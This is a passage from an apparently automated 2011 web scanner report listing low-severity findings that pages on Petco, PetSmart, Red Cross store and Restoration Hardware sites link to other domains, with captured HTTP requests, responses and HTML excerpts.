Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/default.aspx?aid=10413444&pid=2537521&cm_mmc=cj-_-cid-_-2537521-_-10413444
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: Compiled
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:57:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:56:15 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:56:15 PM; domain=.petco.com; expires=Sun, 14-Aug-2011 01:56:15 GMT; path=/
Set-Cookie: Basket=AffiliateCJExpiryDate=6/19/2011 6:56:15 PM&PID=2537521&AID=10413444; domain=.petco.com; expires=Tue, 16-Aug-2011 01:56:15 GMT; path=/
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 97339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</style>

<script type="text/javascript" src="http://edge.liveclicker.net/scripts/jquery.liveclicker.v1-11_c.js"></script>
...[SNIP]...
<div id="util-social-icons">
<a class="util-tw" href="http://twitter.com/PETCO" target="_blank">Twitter</a>
<a class="util-fb" href="http://www.facebook.com/PETCO" target="_blank">Facebook</a>
...[SNIP]...
</a -->
<a class="util-bl" href="http://www.petcoscoop.com/" target="_blank">BLOG</a>
...[SNIP]...
</a>
<a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.petco.com" id="mcaffee-link"><img width="65" height="37" border="0" src="http://images.scanalert.com/meter/www.petco.com/31.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...
<br />
<a href="http://petco.shoplocal.com/petco/default.aspx?action=nuep&adref=footer">Local Ad</a>
...[SNIP]...
<div class="clearfix">
<a target="_blank" class="footer-social fb" href="http://www.facebook.com/PETCO">PETCO on Facebook</a>
<a target="_blank" class="footer-social tw footer-social-rgt" href="http://twitter.com/PETCO">Twitter</a>
...[SNIP]...
</a> ### -->
<a target="_blank" class="footer-social fbg" href="http://www.facebook.com/GenNaturalPet">Generation Natural Pet</a>
...[SNIP]...
</p>
<a href="http://petco.shoplocal.com/petco/new_user_entry.aspx?adref=hp" manual_cm_re="LocalAd-_-Offline-_-Button">See What's On Sale</a>
...[SNIP]...
<noscript><iframe src="http://view.atdmt.com/iaction/iwcpet_Homepage_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0"
marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

<a target="_blank" href="https://www.bizrate.com/ratings_guide/cust_reviews__mid--29914.html">
<script>
...[SNIP]...

17.49. http://www.petco.com/Secure/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petco.com
Path:	/Secure/Login.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.petco.com/Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx

The response contains the following links to other domains:

http://images.scanalert.com/meter/www.petco.com/31.gif
http://petco.shoplocal.com/petco/default.aspx?action=nuep&adref=footer
http://twitter.com/PETCO
http://www.facebook.com/GenNaturalPet
http://www.facebook.com/PETCO
http://www.petcoscoop.com/
https://www.bizrate.com/ratings_guide/cust_reviews__mid--29914.html
https://www.scanalert.com/RatingVerify?ref=www.petco.com

Request

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/secure/login.aspx?returnurl=/secure/youraccount.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:13:19 GMT
Connection: close
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 43574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<div id="util-social-icons">
<a class="util-tw" href="http://twitter.com/PETCO" target="_blank">Twitter</a>
<a class="util-fb" href="http://www.facebook.com/PETCO" target="_blank">Facebook</a>
...[SNIP]...
</a -->
<a class="util-bl" href="http://www.petcoscoop.com/" target="_blank">BLOG</a>
...[SNIP]...
</a>
<a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.petco.com" id="mcaffee-link"><img width="65" height="37" border="0" src="http://images.scanalert.com/meter/www.petco.com/31.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...
<br />
<a href="http://petco.shoplocal.com/petco/default.aspx?action=nuep&adref=footer">Local Ad</a>
...[SNIP]...
<div class="clearfix">
<a target="_blank" class="footer-social fb" href="http://www.facebook.com/PETCO">PETCO on Facebook</a>
<a target="_blank" class="footer-social tw footer-social-rgt" href="http://twitter.com/PETCO">Twitter</a>
...[SNIP]...
</a> ### -->
<a target="_blank" class="footer-social fbg" href="http://www.facebook.com/GenNaturalPet">Generation Natural Pet</a>
...[SNIP]...

<a target="_blank" href="https://www.bizrate.com/ratings_guide/cust_reviews__mid--29914.html">
<script>
...[SNIP]...

17.50. http://www.petsmart.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petsmart.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.petsmart.com/?rdir=1A

The response contains the following links to other domains:

http://cdn.mercent.com/js/tracker.js
http://fls.doubleclick.net/activityi;src=1174584;type=fy10p031;cat=petsm990;ord=1?
http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx
http://link.mercent.com/image.ashx?merchantID=PETsMART
http://pet.imageg.net/cms_widgets/47/63/476396_assets/pixel.jpg
http://pet.imageg.net/favicon.ico
http://pet.imageg.net/graphics/media/pet/global-assets/css/homepage_cmsTemplate.css
http://pet.imageg.net/graphics/media/pet/global-assets/images/header-logo.png
http://pet.imageg.net/include/shoprunner/css/shoprunner.css
http://pet.imageg.net/include/shoprunner/js/shoprunner_init.js
http://pet.imageg.net/include/swfobject.js
http://pet.imageg.net/js/gomez-gtagb4_noobj.js
http://pet.imageg.net/min-cat/site-css.xml.min.css
http://pet.imageg.net/min-cat/site-head-css.xml.min.css
http://pet.imageg.net/min-cat/site-head-js.xml.min.js
http://pet.imageg.net/min-cat/site-home-css.xml.min.css
http://petsmart.shoplocal.com/petsmart/new_user_entry.aspx?AdRef=ecirc
http://petsmart.versaic.com/
http://phx.corporate-ir.net/phoenix.zhtml?c=93506&p=irol-homeprofile
http://tags.mediaforge.com/if/50
http://www.facebook.com/PetSmart?sk=app_182985495078918
http://www.facebook.com/petsmart
http://www.facebook.com/petsmart/
http://www.mypetsmart.com/
http://www.petsmartcharities.org/
http://www.scanalert.com/RatingVerify?ref=www.petsmart.com
http://www.twitter.com/petsmart
https://images.scanalert.com/meter/www.petsmart.com/31.gif

Request

GET /?rdir=1A HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542861802%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//www.petsmart.com/_1___1305541061807%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:17:53 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<script src="http://pet.imageg.net/min-cat/site-head-js.xml.min.js" type="text/javascript"></script>
...[SNIP]...

<link href="http://pet.imageg.net/min-cat/site-head-css.xml.min.css" type="text/css" rel="stylesheet" />

...[SNIP]...

<link href="http://pet.imageg.net/min-cat/site-home-css.xml.min.css" type="text/css" rel="stylesheet" />

...[SNIP]...

<link href="http://pet.imageg.net/min-cat/site-css.xml.min.css" type="text/css" rel="stylesheet" />

<link rel="SHORTCUT ICON" href="http://pet.imageg.net/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://pet.imageg.net/graphics/media/pet/global-assets/css/homepage_cmsTemplate.css" />

<link rel="canonical" href="http://www.petsmart.com" />
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://pet.imageg.net/include/shoprunner/js/shoprunner_init.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://pet.imageg.net/include/shoprunner/css/shoprunner.css" />

<script>
...[SNIP]...
<a title='PetSmart - Pet supplies and pet products for healthier, happier pets' href='/' onClick='javascript:location.href="/";return false;'><img class="pngfix" src="http://pet.imageg.net/graphics/media/pet/global-assets/images/header-logo.png" width="248" height="100" alt="PetSmart - Pet supplies and pet products for healthier, happier pets" border="0" /></a>
...[SNIP]...


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...
<li id="mainnav-mypetsmart"><a href="http://www.mypetsmart.com/">myPetSmart</a>
...[SNIP]...
<li id="mainnav-shoplocal"><a href="http://petsmart.shoplocal.com/petsmart/new_user_entry.aspx?AdRef=ecirc" style="color:#A30000;">In-store Specials</a>
...[SNIP]...
<div style="padding-right: 20px; padding-left: 0px; float: right; padding-bottom: 0px; margin: 0px; padding-top: 0px"><a title="Join us on Facebook" href="http://www.facebook.com/petsmart"><img alt="Join us on Facebook" border="0" src="/cms_widgets/47/64/476401_assets/icon-facebook.gif"/></a> <a title="Follow us on Twitter" href="http://www.twitter.com/petsmart"><img alt="Follow us on Twitter" border="0" src="/cms_widgets/47/64/476401_assets/icon-twitter.gif"/>
...[SNIP]...


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...
<div id="pet_headerInclude_2" style="width:980px;border:0px;overflow:hidden;">

<img border="0" name="cms_image27355762_10" src="http://pet.imageg.net/cms_widgets/47/63/476396_assets/pixel.jpg" height="1" width="1" align="Default" valign="Default" /></div>
...[SNIP]...
<div class="theme-quick-look-row"><a href="http://www.facebook.com/PetSmart?sk=app_182985495078918" title="Enter our Happiness In Store Contest - Learn more"><img src="/cms_widgets/47/61/476141_assets/hp-051211-ql-r2a.jpg" alt="Enter our Happiness In Store Contest - Learn more" border="0"/>
...[SNIP]...
<li><a href="http://www.twitter.com/petsmart" title="Follow us on Twitter" target="_blank"><img src="http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif" alt="Follow us on Twitter" width="16" height="16" border="0"/></a> <a href="http://www.twitter.com/petsmart" title="Follow us on Twitter" target="_blank">Follow us on Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/petsmart/" title="Join us on Facebook" target="_blank"><img src="http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif" alt="Join us on Facebook" width="16" height="16" border="0"/></a> <a href="http://www.facebook.com/petsmart/" title="Join us on Facebook" target="_blank">Join us on Facebook</a>
...[SNIP]...
<li><a href="http://www.mypetsmart.com" title="myPetSmart.com" target="_blank">myPetSmart.com</a>
...[SNIP]...
<li><a href="http://www.petsmartcharities.org" title="PetSmart Charities">PetSmart Charities</a>
...[SNIP]...
<li><a href="http://www.petsmartcharities.org" title="PetSmart Charities">PetSmart Charities</a>
...[SNIP]...
<li class="first"><a title="About Us" shape="rect" href="http://phx.corporate-ir.net/phoenix.zhtml?c=93506&p=irol-homeprofile">About Us</a>
...[SNIP]...
<li><a href="http://petsmart.versaic.com" title="Event Sponsorship">Event Sponsorship</a>
...[SNIP]...
<li><a title="PetSmart Charities" target="_blank" shape="rect" href="http://www.petsmartcharities.org">Charities</a>
...[SNIP]...
<map id="map" name="CharitySPOTMAP"><area coords="5,5,170,83" shape="rect" href="http://www.petsmartcharities.org/"/></map>
...[SNIP]...
<br /><a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.petsmart.com"><img src='https://images.scanalert.com/meter/www.petsmart.com/31.gif' alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...


<script src="http://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://link.mercent.com/image.ashx?merchantID=PETsMART" style="display: none;">
</noscript>
...[SNIP]...
<noscript>
       <iframe src="http://fls.doubleclick.net/activityi;src=1174584;type=fy10p031;cat=petsm990;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

<iframe width="0" scrolling="no" height="0" frameborder="0" src="http://tags.mediaforge.com/if/50"></iframe>
...[SNIP]...


   <script type="text/javascript" defer="defer" src="http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx"></script>
...[SNIP]...

17.51. https://www.petsmart.com/checkout/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.petsmart.com
Path:	/checkout/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://www.petsmart.com/checkout/index.jsp?process=login

The response contains the following links to other domains:

https://cdn.mercent.com/js/tracker.js
https://images.scanalert.com/meter/www.petsmart.com/31.gif
https://tags.mediaforge.com/if/50

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:25 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

<iframe width="0" scrolling="no" height="0" frameborder="0" src="https://tags.mediaforge.com/if/50"></iframe>
...[SNIP]...

17.52. http://www.redcrossstore.org/Shopper/Product.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redcrossstore.org
Path:	/Shopper/Product.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.redcrossstore.org/Shopper/Product.aspx?UniqueItemId=464

The response contains the following links to other domains:

http://www.orderhouse.com/
http://www.redcross.org/
http://www.redcross.org/where
https://www.givelife.org/?utm_source=toolbar&utm_medium=storefront&utm_campaign=giveblood

Request

GET /Shopper/Product.aspx?UniqueItemId=464 HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://www.redcrossstore.org/shopper/prodlist.aspx?LocationId=117
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.1.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:23:43 GMT
Content-Length: 71907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
<head>
<meta http-equiv="content-type" conten
...[SNIP]...
<span style="vertical-align: top; white-space: nowrap;"><a href="http://www.redcross.org" style="font-weight: bold; color: #666666;">Jump to RedCross.org <img alt="" src="/Navigation/RedCrossStore/images/arrow.gif" width="17" height="17" style="vertical-align: middle; border-width: 0px;border-style: solid;" />
...[SNIP]...
<li class="rmItem "><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<li class="rmItem rmLast"><a href="https://www.givelife.org/?utm_source=toolbar&utm_medium=storefront&utm_campaign=giveblood" title="Give Blood" class="rmLink rmRootLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<td align="right"><a href="http://www.orderhouse.com" target="_blank"><img src='/images/logo_PoweredByOH.gif' border="0" alt=""/>
...[SNIP]...
<li class="rmItem rmLast"><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink rmRootLink Menu310Root" style="cursor:pointer"><span class="rmText">
...[SNIP]...

17.53. http://www.redcrossstore.org/dp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redcrossstore.org
Path:	/dp.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.redcrossstore.org/dp.aspx?pgid=-1&sto=1

The response contains the following links to other domains:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1
http://www.orderhouse.com/
http://www.redcross.org/
http://www.redcross.org/where
https://www.givelife.org/?utm_source=toolbar&utm_medium=storefront&utm_campaign=giveblood

Request

GET /dp.aspx?pgid=-1&sto=1 HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.3.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:49:45 GMT
Content-Length: 48320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
<head>
<meta http-equiv="content-type" conten
...[SNIP]...
<span style="vertical-align: top; white-space: nowrap;"><a href="http://www.redcross.org" style="font-weight: bold; color: #666666;">Jump to RedCross.org <img alt="" src="/Navigation/RedCrossStore/images/arrow.gif" width="17" height="17" style="vertical-align: middle; border-width: 0px;border-style: solid;" />
...[SNIP]...
<li class="rmItem "><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<li class="rmItem rmLast"><a href="https://www.givelife.org/?utm_source=toolbar&utm_medium=storefront&utm_campaign=giveblood" title="Give Blood" class="rmLink rmRootLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<td align="right"><a href="http://www.orderhouse.com" target="_blank"><img src='/images/logo_PoweredByOH.gif' border="0" alt=""/>
...[SNIP]...
<li class="rmItem rmLast"><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink rmRootLink Menu310Root" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1" type="text/javascript" defer="defer" ></script>
...[SNIP]...

17.54. http://www.redcrossstore.org/shopper/prodlist.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redcrossstore.org
Path:	/shopper/prodlist.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.redcrossstore.org/shopper/prodlist.aspx?LocationId=117

The response contains the following links to other domains:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1
http://www.orderhouse.com/
http://www.redcross.org/
http://www.redcross.org/where
https://www.givelife.org/?utm_source=toolbar&utm_medium=storefront&utm_campaign=giveblood

Request

GET /shopper/prodlist.aspx?LocationId=117 HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://www.redcrossstore.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; AccountType=; Pref=0; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; __utma=64822188.2001743552.1305511150.1305511150.1305511150.1; __utmc=64822188

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:18:48 GMT
Content-Length: 83441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
<head>
<meta http-equiv="content-type" conten
...[SNIP]...
<span style="vertical-align: top; white-space: nowrap;"><a href="http://www.redcross.org" style="font-weight: bold; color: #666666;">Jump to RedCross.org <img alt="" src="/Navigation/RedCrossStore/images/arrow.gif" width="17" height="17" style="vertical-align: middle; border-width: 0px;border-style: solid;" />
...[SNIP]...
<li class="rmItem "><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<li class="rmItem rmLast"><a href="https://www.givelife.org/?utm_source=toolbar&utm_medium=storefront&utm_campaign=giveblood" title="Give Blood" class="rmLink rmRootLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<td align="right"><a href="http://www.orderhouse.com" target="_blank"><img src='/images/logo_PoweredByOH.gif' border="0" alt=""/>
...[SNIP]...
<li class="rmItem rmLast"><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink rmRootLink Menu310Root" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1" type="text/javascript" defer="defer" ></script>
...[SNIP]...

17.55. https://www.redcrossstore.org/dp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.redcrossstore.org
Path:	/dp.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://www.redcrossstore.org/dp.aspx?pgid=-22&ReturnTo=Cart

The response contains the following link to another domain:

https://www.givelife.org/?utm_source=toolbar&utm_medium=storefront&utm_campaign=giveblood

Request

Response

17.56. http://www.restorationhardware.com/content/promo.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.restorationhardware.com
Path:	/content/promo.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore

The response contains the following links to other domains:

http://www.facebook.com/RestorationHardware
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35
http://www.rhbabyandchild.com/index.jsp

Request

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:21 GMT
Connection: close
Set-Cookie: TS1c138a=7b67f70a184190a3c9165eedcfa7ec9d2efa223a5124b4964dd08bf9; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:21 GMT
Content-Length: 18688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
